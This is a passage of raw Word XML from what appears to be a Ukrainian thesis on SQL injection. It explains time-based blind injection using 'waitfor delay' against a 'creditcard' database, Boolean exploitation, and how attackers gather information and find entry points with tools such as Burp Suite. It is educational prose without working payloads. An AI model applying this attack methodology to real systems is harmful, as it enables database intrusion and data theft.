        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Крок 2: перевірка чи база даних “ creditcard ”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>існує</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CACA982" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Крок 3: якщо ні, відобразиться “</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We are unable to process your request. Please</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>later</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFD08C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Крок 4: Якщо так, сон на 10 секунд. Після 10 секунд відобразиться “</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We are unable to process your request. Please try back later</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39204920" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Оскільки повідомлення про помилку не повертаються, користуються ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>waitfor delay’</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> командою для перевірки статусу виконання</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A2284B" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="006132FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="006132FD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="006132FD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F08CA7" w14:textId="422C65E7" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Technique</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> виконується шляхом правильного питання бази даних. Якщо атакуючий конструює і виконує правильний запит, база даних виявить все, що атакуючий хоче знати, що допоможе в виконанні подальшої атаки.[2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">] В цій техніці, атакуючий використає встановлення булевої операції для витягнення інформації про таблиці. Зловмисник часто використовує цю техніку, якщо з'ясовується, що програма вразлива до сліпої атаки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Якщо додаток не повертає будь яких стандартних помилок, атакуючий намагається використати булеві операції проти додатку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850C07A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF4F20A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="001E06E1" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc516752132"/>
      <w:bookmarkStart w:id="55" w:name="_Toc30433116"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.5 Методологія SQL-ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF67526" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F9150A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="001E06E1" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc516752133"/>
      <w:bookmarkStart w:id="57" w:name="_Toc30433117"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.5.1 Збір інформації</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8D921" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369E9F2E" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Розуміння основних SQL запитів дозволить атакуючому створити правильну SQL ін’єкцію. Повідомлення про помилку істотно допомагає по збору інформації з бази даних. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D7987" w14:textId="51A3CF74" w:rsidR="00A419FD" w:rsidRPr="00FB6169" w:rsidRDefault="00A419FD" w:rsidP="00FB6169">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В залежності від типу знайденої помилки, атакуючий може випробовувати різні техніки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Атакуючий використовує збір інформації також відомий як метод опитування та оцінки, для визначення повної інформації про ціль. Атакуючий вивчає вид баз даних, версію, рівень доступу користувача, і різноманітні речі у використанні.[2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C3DBB" w14:textId="4DE63B62" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий зазвичай збирає інформацію на різних рівнях починаючи з ідентифікації типу бази даних і пошукового движка. Різні бази даних вимагають різний SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>синтаксис. Атакуючий знаходить движок бази даних використовуючи сервер.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ідентифікація рівнів доступу є ще одним кроком, оскільки є шанс отримати вищий рівень доступу як справжній користувач.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий спробує отримати пароль і поставить під загрозу систему. Взаємодія з операційною системою через виконання команд в командному рядку дозволяє атакуючому керувати</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> цілою мережею.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148107BB" w14:textId="77777777" w:rsidR="008B0B5B" w:rsidRPr="004B547E" w:rsidRDefault="008B0B5B" w:rsidP="004B547E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B191B5C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc516752134"/>
      <w:bookmarkStart w:id="59" w:name="_Toc30433118"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Identifying data entry paths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="5D3B459A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="001E06E1" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EA1317" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакуючий шукатиме всі можливі вхідні ворота програми через які він буде намагатись використовувати різні техніки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакуючий може використовувати автоматизовані інструменти такі як </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tamper</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, і тд. Вхідні ворота можуть включати поля введення у веб формі, приховані поля, або кукі які використовуються і в додатках для підтримки сесії. Атакуючий аналізує веб GET і POST запити, що відправляються до додатку цілі з допомогою інструментів згаданих вище щоб знайти вхідні ворота для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Наступні інструменти можуть допомогти вторгненню з GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>запитами для знаходження вхідних воріт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB33A5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="005027FB" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tamper</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Цей додаток розроблений для </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Він розроблений для підробки даних, дозволяючи атакуючому переглядати і модифікувати </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
